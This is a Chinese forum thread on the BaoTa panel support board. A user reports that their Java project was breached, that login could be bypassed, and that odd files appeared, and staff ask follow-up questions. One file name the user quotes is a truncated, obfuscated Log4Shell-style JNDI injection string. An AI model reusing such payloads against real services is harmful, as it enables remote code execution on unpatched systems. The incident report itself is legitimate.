【待反馈】系统被攻陷宝塔独立项目多出奇怪文件
为了能快速了解并处理您的问题,请提供以下基础信息:面板、插件版本:8.2.0系统版本:centos
问题描述:java独立项目系统被攻陷,能越过登录操作api
相关截图(日志、错误):独立项目里面多出来了几个奇怪的文件${:-y$}{${6pr:-j}nd${env:fm4:-}i:d${xyf::-n}s:${url:UTF-8:http:..'
https://i.afbcs.cn/Swjmt9 https://i.afbcs.cn/Swjmt9 宝塔用户_ixvyqq 发表于 2024-8-27 17:55
https://i.afbcs.cn/Swjmt9
您好,无法查看您的图片,您说的应该是您的项目被攻击了吧 运维技术阿闯 发表于 2024-8-28 11:24
您好,无法查看您的图片,您说的应该是您的项目被攻击了吧
对的,就是被攻击了,最后排查就是独立项目里面多出来了这些文件 https://i.afbcs.cn/Swjmt9 https://ibb.co/L1cHsLW 这个图片地址,正常传递怎么显示不出来。。。
https://ibb.co/L1cHsLW 我研究了半天没什么文献资料,只有说ssl证书漏洞的 宝塔用户_ixvyqq 发表于 2024-8-28 14:13
我研究了半天没什么文献资料,只有说ssl证书漏洞的
您好,具体情况需要排查的,类似您是否有开启安全防护呢,是否有安装安全类的插件呢
页:
[1]